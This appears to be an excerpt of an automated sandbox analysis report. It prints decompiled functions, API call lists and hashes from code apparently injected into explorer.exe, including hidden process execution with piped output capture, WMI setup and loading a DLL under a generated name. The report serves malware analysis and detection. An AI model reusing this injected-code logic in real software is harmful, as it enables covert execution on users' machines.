                  0x000916e5
                  0x000916ea
                  0x00000000
                  0x00000000
                  0x000916f2
                  0x000916f4
                  0x000916f9
                  0x00000000
                  0x00000000
                  0x00091703
                  0x00091707
                  0x00000000
                  0x00000000
                  0x00091709
                  0x0009170e
                  0x00091710
                  0x00091711
                  0x00091715
                  0x0009171b
                  0x00000000
                  0x00000000
                  0x00091726
                  0x0009172f
                  0x00091733
                  0x00000000
                  0x00000000
                  0x00091735
                  0x00091737
                  0x0009173f
                  0x00091741
                  0x00091742
                  0x0009174a
                  0x00000000

                  APIs
                  • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,0008765A,?,?,00000000,?), ref: 000916CB
                  • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 000916E3
                  • GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 000916F2
                  • GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 00091701
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AddressProc$HandleModule
                  • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                  • API String ID: 667068680-129414566
                  • Opcode ID: 27f9b75c89bbff0010089760dc2ea391a5fe869bbdee21b5a79a33e181e9a0cc
                  • Instruction ID: f7ee788a374f61118607f953ef7ffa495e5dc05b0280f9c56cf14542586de261
                  • Opcode Fuzzy Hash: 27f9b75c89bbff0010089760dc2ea391a5fe869bbdee21b5a79a33e181e9a0cc
                  • Instruction Fuzzy Hash: B5117731B046177BDF515BEA8C84EEFBBF9AF46780B044065FA15F6240DA70D901A764
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00092122, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 87%
                  			E00092122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				int _t15;
				char* _t24;
				char* _t26;
				char* _t28;
				char* _t29;
				signed int _t40;
				char* _t43;
				char* _t45;
				long long* _t47;

				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t26 = _a4;
				_push(_t30);
				 *_t47 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t26);
				L00092285();
				_t40 = _t12;
				if(_t40 < 0 || _t40 >= _a8) {
					L19:
					_t13 = _t12 | 0xffffffff;
					goto L20;
				} else {
					L000922CD();
					_t15 =  *((intOrPtr*)( *_t12));
					if(_t15 != 0x2e) {
						_t24 = strchr(_t26, _t15);
						if(_t24 != 0) {
							 *_t24 = 0x2e;
						}
					}
					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
						L11:
						_t43 = strchr(_t26, 0x65);
						_t28 = _t43;
						if(_t43 == 0) {
							L18:
							_t13 = _t40;
							L20:
							return _t13;
						}
						_t45 = _t43 + 1;
						_t29 = _t28 + 2;
						if( *_t45 == 0x2d) {
							_t45 = _t29;
						}
						while( *_t29 == 0x30) {
							_t29 = _t29 + 1;
						}
						if(_t29 != _t45) {
							E00088706(_t45, _t29, _t40 - _t29 + _a4);
							_t40 = _t40 + _t45 - _t29;
						}
						goto L18;
					} else {
						_t6 = _t40 + 3; // 0x909b2
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L19;
						}
						_t26[_t40] = 0x302e;
						( &(_t26[2]))[_t40] = 0;
						_t40 = _t40 + 2;
						goto L11;
					}
				}
			}














                  0x00092125
                  0x0009212a
                  0x0009212e
                  0x0009212e
                  0x00092133
                  0x00092138
                  0x00092139
                  0x0009213c
                  0x0009213d
                  0x00092142
                  0x00092145
                  0x00092146
                  0x0009214b
                  0x00092152
                  0x000921f8
                  0x000921f8
                  0x00000000
                  0x00092161
                  0x00092161
                  0x00092168
                  0x0009216c
                  0x00092173
                  0x0009217c
                  0x0009217e
                  0x0009217e
                  0x0009217c
                  0x0009218d
                  0x000921b3
                  0x000921bc
                  0x000921be
                  0x000921c4
                  0x000921f3
                  0x000921f3
                  0x000921fb
                  0x000921fe
                  0x000921fe
                  0x000921c6
                  0x000921c7
                  0x000921cd
                  0x000921cf
                  0x000921cf
                  0x000921d4
                  0x000921d3
                  0x000921d3
                  0x000921db
                  0x000921e7
                  0x000921f1
                  0x000921f1
                  0x00000000
                  0x0009219d
                  0x0009219d
                  0x0009219d
                  0x000921a3
                  0x00000000
                  0x00000000
                  0x000921a5
                  0x000921ab
                  0x000921b0
                  0x00000000
                  0x000921b0
                  0x0009218d

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: strchr$_snprintflocaleconv
                  • String ID: %.*g
                  • API String ID: 1910550357-952554281
                  • Opcode ID: ce2afa961fa85e74440034e363737a64cfa4b0764273ec5c58c06da3881b6a43
                  • Instruction ID: 1807b53470dfa9210b137be6f10a1510799a81b613ee7934cd0fe15d2e85ebbb
                  • Opcode Fuzzy Hash: ce2afa961fa85e74440034e363737a64cfa4b0764273ec5c58c06da3881b6a43
                  • Instruction Fuzzy Hash: 8E216A766047427ADF259A28DCC6BEA3BDCDF25330F150155FE509A182EA74EC60B3A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 000902B2, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: _snprintfqsort
                  • String ID: %I64d$false$null$true
                  • API String ID: 756996078-4285102228
                  • Opcode ID: c3656f1e48f6528892983799641ac3336606c700c83bb0b62e38ba968db40f99
                  • Instruction ID: e8f87335b98eb15e4b72e6aadc3c6444a94586e470a32963d335527edd021b66
                  • Opcode Fuzzy Hash: c3656f1e48f6528892983799641ac3336606c700c83bb0b62e38ba968db40f99
                  • Instruction Fuzzy Hash: F1E17DB190020ABFDF119F64CC46EEF3BA9EF55384F108019FE1596152EB31DA61EBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008D748, Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON
                  Download Yara Rule
                  APIs
                  • SysAllocString.OLEAUT32(00000000), ref: 0008D75C
                  • SysAllocString.OLEAUT32(?), ref: 0008D764
                  • SysAllocString.OLEAUT32(00000000), ref: 0008D778
                  • SysFreeString.OLEAUT32(?), ref: 0008D7F3
                  • SysFreeString.OLEAUT32(?), ref: 0008D7F6
                  • SysFreeString.OLEAUT32(?), ref: 0008D7FB
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: String$AllocFree
                  • String ID:
                  • API String ID: 344208780-0
                  • Opcode ID: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
                  • Instruction ID: a89b29efd16a02d44f6d8e25ac1661f5a2b1d21aaf5940480051179919990030
                  • Opcode Fuzzy Hash: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
                  • Instruction Fuzzy Hash: 1821F975900218AFDB10EFA5CC88DAFBBBDFF48654B10449AF505E7250DA71AE01CB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 000907F7, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$\u%04X$\u%04X\u%04X
                  • API String ID: 0-2132903582
                  • Opcode ID: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
                  • Instruction ID: fcde36fe93850f7dd9ad1ae31ae76e92f94782fe824cdb2d7e9ac6baa3171ba9
                  • Opcode Fuzzy Hash: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
                  • Instruction Fuzzy Hash: C6411931700205EFEF784A9CCD9ABBF2AA8DF45340F244125F986D6396DA61CD91B3D1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008D523, Relevance: 7.6, APIs: 5, Instructions: 87commemoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 30%
                  			E0008D523(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x9b848, 0, 1, 0x9b858, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E00088604(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}













                  0x0008d530
                  0x0008d533
                  0x0008d536
                  0x0008d547
                  0x0008d54d
                  0x0008d55e
                  0x0008d566
                  0x0008d5b7
                  0x0008d5b7
                  0x0008d5bc
                  0x0008d5c1
                  0x0008d5c1
                  0x0008d5c4
                  0x0008d5c9
                  0x0008d5ce
                  0x0008d5ce
                  0x0008d5d1
                  0x0008d568
                  0x0008d569
                  0x0008d56f
                  0x0008d580
                  0x0008d585
                  0x00000000
                  0x0008d587
                  0x0008d594
                  0x0008d59c
                  0x00000000
                  0x0008d59e
                  0x0008d5a0
                  0x0008d5a8
                  0x00000000
                  0x0008d5aa
                  0x0008d5ad
                  0x0008d5b3
                  0x0008d5b3
                  0x0008d5a8
                  0x0008d59c
                  0x0008d585
                  0x0008d5d6

                  APIs
                  • CoInitializeEx.OLE32(00000000,00000000), ref: 0008D536
                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D547
                  • CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D55E
                  • SysAllocString.OLEAUT32(00000000), ref: 0008D569
                  • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D594
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
                  • String ID:
                  • API String ID: 1610782348-0
                  • Opcode ID: 61e718e46d9626c6fc607ac76e9c554d5449760960f597cd4dce1a0c96a4aa07
                  • Instruction ID: 5ca9e363416111ca0ccf9453dcb24a0453d396344b9ddfdbf921160754929c58
                  • Opcode Fuzzy Hash: 61e718e46d9626c6fc607ac76e9c554d5449760960f597cd4dce1a0c96a4aa07
                  • Instruction Fuzzy Hash: 6F21E970600245BBEB249B66DC4DE6FBFBCFFC6B25F10415EB541A62A0DA709A01CB30
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 000921FF, Relevance: 7.6, APIs: 5, Instructions: 52stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 79%
                  			E000921FF(char* __eax, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t9;
				signed char _t11;
				char** _t19;
				char _t22;
				long long _t32;
				long long _t33;

				_t9 = __eax;
				L000922CD();
				_t19 = _a4;
				_t22 =  *__eax;
				if( *_t22 != 0x2e) {
					_t9 = strchr( *_t19, 0x2e);
					if(_t9 != 0) {
						 *_t9 =  *_t22;
					}
				}
				L00092291();
				 *_t9 =  *_t9 & 0x00000000;
				_t11 = strtod( *_t19,  &_v8);
				asm("fst qword [ebp-0xc]");
				_t32 =  *0x98250;
				asm("fucomp st1");
				asm("fnstsw ax");
				if((_t11 & 0x00000044) != 0) {
					L5:
					st0 = _t32;
					L00092291();
					if( *_t11 != 0x22) {
						_t33 = _v16;
						goto L8;
					} else {
						return _t11 | 0xffffffff;
					}
				} else {
					_t33 =  *0x98258;
					asm("fucomp st1");
					asm("fnstsw ax");
					if((_t11 & 0x00000044) != 0) {
						L8:
						 *_a8 = _t33;
						return 0;
					} else {
						goto L5;
					}
				}
			}











                  0x000921ff
                  0x00092207
                  0x0009220c
                  0x0009220f
                  0x00092214
                  0x0009221a
                  0x00092223
                  0x00092227
                  0x00092227
                  0x00092223
                  0x00092229
                  0x0009222e
                  0x00092237
                  0x0009223c
                  0x0009223f
                  0x00092248
                  0x0009224a
                  0x00092251
                  0x00092262
                  0x00092262
                  0x00092264
                  0x0009226c
                  0x00092273
                  0x00000000
                  0x0009226e
                  0x00092272
                  0x00092272
                  0x00092253
                  0x00092253
                  0x00092259
                  0x0009225b
                  0x00092260
                  0x00092276
                  0x00092279
                  0x0009227e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00092260

                  APIs
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: _errno$localeconvstrchrstrtod
                  • String ID:
                  • API String ID: 1035490122-0
                  • Opcode ID: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
                  • Instruction ID: 9be57ecffa989f7d2828815fae2d17a9d7f4e019258d81125002a8d3572c8328
                  • Opcode Fuzzy Hash: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
                  • Instruction Fuzzy Hash: 7701F239904205FADF127F24E9057DD7BA8AF4B360F2041D1E9D0A61E2DB759854E7A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008A9B7, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177pipeCOMMON
                  Download Yara Rule
                  C-Code - Quality: 73%
                  			E0008A9B7(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				struct _SECURITY_ATTRIBUTES _v48;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				short _v92;
				intOrPtr _v96;
				void _v140;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t102;
				long _t111;
				intOrPtr _t115;
				intOrPtr _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t111 = 0;
				_v24 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t127 = 0;
				_v8 = 0;
				_v16 = 0;
				_v48.nLength = 0xc;
				_v48.lpSecurityDescriptor = 0;
				_v48.bInheritHandle = 1;
				_v28 = 0;
				memset( &_v140, 0, 0x44);
				asm("stosd");
				_t130 = _t129 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
					L18:
					return 0;
				}
				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
					L13:
					E0008861A( &_v28, 0);
					if(_v20 != 0) {
						_t77 =  *0x9e684; // 0x40f8f0
						 *((intOrPtr*)(_t77 + 0x30))(_v20);
					}
					if(_v8 != 0) {
						_t115 =  *0x9e684; // 0x40f8f0
						 *((intOrPtr*)(_t115 + 0x30))(_v8);
					}
					return _t111;
				}
				_t79 = _v16;
				_v76 = _t79;
				_v80 = _t79;
				_v84 = _v12;
				_v140 = 0x44;
				_v96 = 0x101;
				_v92 = 0;
				_t126 = E00088604(0x1001);
				_v28 = _t126;
				if(_t126 == 0) {
					goto L18;
				}
				_push( &_v64);
				_push( &_v140);
				_t85 =  *0x9e684; // 0x40f8f0
				_push(0);
				_push(0);
				_push(0x8000000);
				_push(1);
				_push(0);
				_push(0);
				_push(_v24);
				_push(0);
				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
					goto L13;
				}
				_t87 =  *0x9e684; // 0x40f8f0
				 *((intOrPtr*)(_t87 + 0x30))(_v12);
				_t89 =  *0x9e684; // 0x40f8f0
				 *((intOrPtr*)(_t89 + 0x30))(_v16);
				_v24 = _v24 & 0;
				do {
					_t92 =  *0x9e684; // 0x40f8f0
					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
					 *((char*)(_v24 + _t126)) = 0;
					if(_t111 == 0) {
						_t127 = E000891A6(_t126, 0);
					} else {
						_push(0);
						_push(_t126);
						_v32 = _t127;
						_t127 = E00089292(_t127);
						E0008861A( &_v32, 0xffffffff);
						_t130 = _t130 + 0x14;
					}
					_t111 = _t127;
					_v32 = _t127;
				} while (_v36 != 0);
				_push( &_v36);
				_push(E0008C379(_t127));
				_t98 =  *0x9e68c; // 0x40fab8
				_push(_t127);
				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
					L12:
					_t100 =  *0x9e684; // 0x40f8f0
					 *((intOrPtr*)(_t100 + 0x30))(_v64);
					_t102 =  *0x9e684; // 0x40f8f0
					 *((intOrPtr*)(_t102 + 0x30))(_v60);
					goto L13;
				}
				_t128 = E00089256(_t127);
				if(_t128 == 0) {
					goto L12;
				}
				E0008861A( &_v32, 0);
				return _t128;
			}




































                  0x0008a9c2
                  0x0008a9c4
                  0x0008a9d0
                  0x0008a9d5
                  0x0008a9d8
                  0x0008a9da
                  0x0008a9dd
                  0x0008a9e0
                  0x0008a9e7
                  0x0008a9ea
                  0x0008a9f1
                  0x0008a9f4
                  0x0008a9fe
                  0x0008a9ff
                  0x0008aa02
                  0x0008aa04
                  0x0008aa05
                  0x0008aa1c
                  0x0008ab9c
                  0x00000000
                  0x0008ab9c
                  0x0008aa33
                  0x0008ab68
                  0x0008ab6e
                  0x0008ab79
                  0x0008ab7b
                  0x0008ab83
                  0x0008ab83
                  0x0008ab8a
                  0x0008ab8c
                  0x0008ab95
                  0x0008ab95
                  0x00000000
                  0x0008ab98
                  0x0008aa39
                  0x0008aa3c
                  0x0008aa3f
                  0x0008aa45
                  0x0008aa4f
                  0x0008aa59
                  0x0008aa60
                  0x0008aa69
                  0x0008aa6b
                  0x0008aa71
                  0x00000000
                  0x00000000
                  0x0008aa7c
                  0x0008aa83
                  0x0008aa84
                  0x0008aa89
                  0x0008aa8a
                  0x0008aa8b
                  0x0008aa90
                  0x0008aa92
                  0x0008aa93
                  0x0008aa94
                  0x0008aa97
                  0x0008aa9d
                  0x00000000
                  0x00000000
                  0x0008aaa3
                  0x0008aaab
                  0x0008aaae
                  0x0008aab6
                  0x0008aab9
                  0x0008aabc
                  0x0008aac2
                  0x0008aad6
                  0x0008aadc
                  0x0008aae2
                  0x0008ab0b
                  0x0008aae4
                  0x0008aae4
                  0x0008aae6
                  0x0008aae8
                  0x0008aaf0
                  0x0008aaf8
                  0x0008aafd
                  0x0008aafd
                  0x0008ab11
                  0x0008ab13
                  0x0008ab13
                  0x0008ab1b
                  0x0008ab23
                  0x0008ab24
                  0x0008ab29
                  0x0008ab32
                  0x0008ab52
                  0x0008ab52
                  0x0008ab5a
                  0x0008ab5d
                  0x0008ab65
                  0x00000000
                  0x0008ab65
                  0x0008ab3b
                  0x0008ab3f
                  0x00000000
                  0x00000000
                  0x0008ab47
                  0x00000000

                  APIs
                  • memset.MSVCRT ref: 0008A9F4
                  • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 0008AA18
                  • CreatePipe.KERNEL32(000865A9,?,0000000C,00000000), ref: 0008AA2F
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                    • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateHeapPipe$AllocateFreememset
                  • String ID: D
                  • API String ID: 2365139273-2746444292
                  • Opcode ID: 3257b47c2173d9b5d448dffc2d1f1eb9bf365702ae8efab7a5ef50753d258819
                  • Instruction ID: 1038731307509bc63423b83b895d9a6edc7a8df2068bd220f00375d18a9fab8d
                  • Opcode Fuzzy Hash: 3257b47c2173d9b5d448dffc2d1f1eb9bf365702ae8efab7a5ef50753d258819
                  • Instruction Fuzzy Hash: 3A512C72E00209AFEB51EFA4CC45FDEBBB9BB08300F14416AF544E7152EB7499048B61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008C4CE, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117libraryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 89%
                  			E0008C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				char* _t63;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x9e688; // 0xb0000
				_t14 =  *(_t50 + 0x1898);
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E000895E1(_t50, 0xb62);
					_t66 =  *0x9e688; // 0xb0000
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E00089640( &_v140, 0x40, L"%08x", E0008D400(_t66 + 0xb0, E0008C379(_t66 + 0xb0), 0));
					_t20 =  *0x9e688; // 0xb0000
					asm("sbb eax, eax");
					_t25 = E000895E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
					_t63 = "\\";
					_t26 =  *0x9e688; // 0xb0000
					_t68 = E000892E5(_t26 + 0x1020);
					_v12 = _t68;
					E000885D5( &_v8);
					_t32 =  *0x9e688; // 0xb0000
					_t34 = E000892E5(_t32 + 0x122a);
					 *0x9e784 = _t34;
					_t35 =  *0x9e684; // 0x40f8f0
					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x9e784);
					 *0x9e77c = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E0008E171(0x9bb48, _t60);
					}
					 *0x9e780 = _t38;
					E0008861A( &_v12, 0xfffffffe);
					memset( &_v140, 0, 0x80);
					if( *0x9e780 != 0) {
						goto L10;
					} else {
						E0008861A(0x9e784, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x9e780 == 0) {
						_t46 =  *0x9e6bc; // 0x40fa18
						 *0x9e780 = _t46;
					}
					L10:
					return 1;
				}
			}


























                  0x0008c4ce
                  0x0008c4ce
                  0x0008c4ce
                  0x0008c4d1
                  0x0008c4dd
                  0x0008c4e8
                  0x0008c504
                  0x0008c509
                  0x0008c512
                  0x0008c514
                  0x0008c51c
                  0x0008c53d
                  0x0008c542
                  0x0008c54f
                  0x0008c55a
                  0x0008c561
                  0x0008c568
                  0x0008c579
                  0x0008c57f
                  0x0008c582
                  0x0008c599
                  0x0008c5a5
                  0x0008c5ad
                  0x0008c5b4
                  0x0008c5ba
                  0x0008c5c6
                  0x0008c5cc
                  0x0008c5d3
                  0x0008c5e6
                  0x0008c5d5
                  0x0008c5d5
                  0x0008c5d8
                  0x0008c5de
                  0x0008c5e3
                  0x0008c5e8
                  0x0008c5f3
                  0x0008c605
                  0x0008c617
                  0x00000000
                  0x0008c619
                  0x0008c620
                  0x00000000
                  0x0008c626
                  0x0008c627
                  0x0008c627
                  0x0008c62e
                  0x0008c630
                  0x0008c635
                  0x0008c635
                  0x0008c63a
                  0x0008c63e
                  0x0008c63e

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: LibraryLoadmemset
                  • String ID: %08x$dll
                  • API String ID: 3406617148-2963171978
                  • Opcode ID: 948a104aa5df4c5dbcc384966bb2a77367822955b2633470f72edfc99a841e9d
                  • Instruction ID: f3dd22374d708548471efb5ddff1d4c344fbc2453a9af2a3a2ac9a4f9c61bf9a
                  • Opcode Fuzzy Hash: 948a104aa5df4c5dbcc384966bb2a77367822955b2633470f72edfc99a841e9d
                  • Instruction Fuzzy Hash: BB31B3B2A00244BBFB10FBA8EC89FAA73ACFB54354F544036F145D7192EB789D418725
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00092D70, Relevance: 6.6, APIs: 5, Instructions: 341COMMON
                  Download Yara Rule
                  C-Code - Quality: 99%
                  			E00092D70(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0x84e85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E00095D90(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
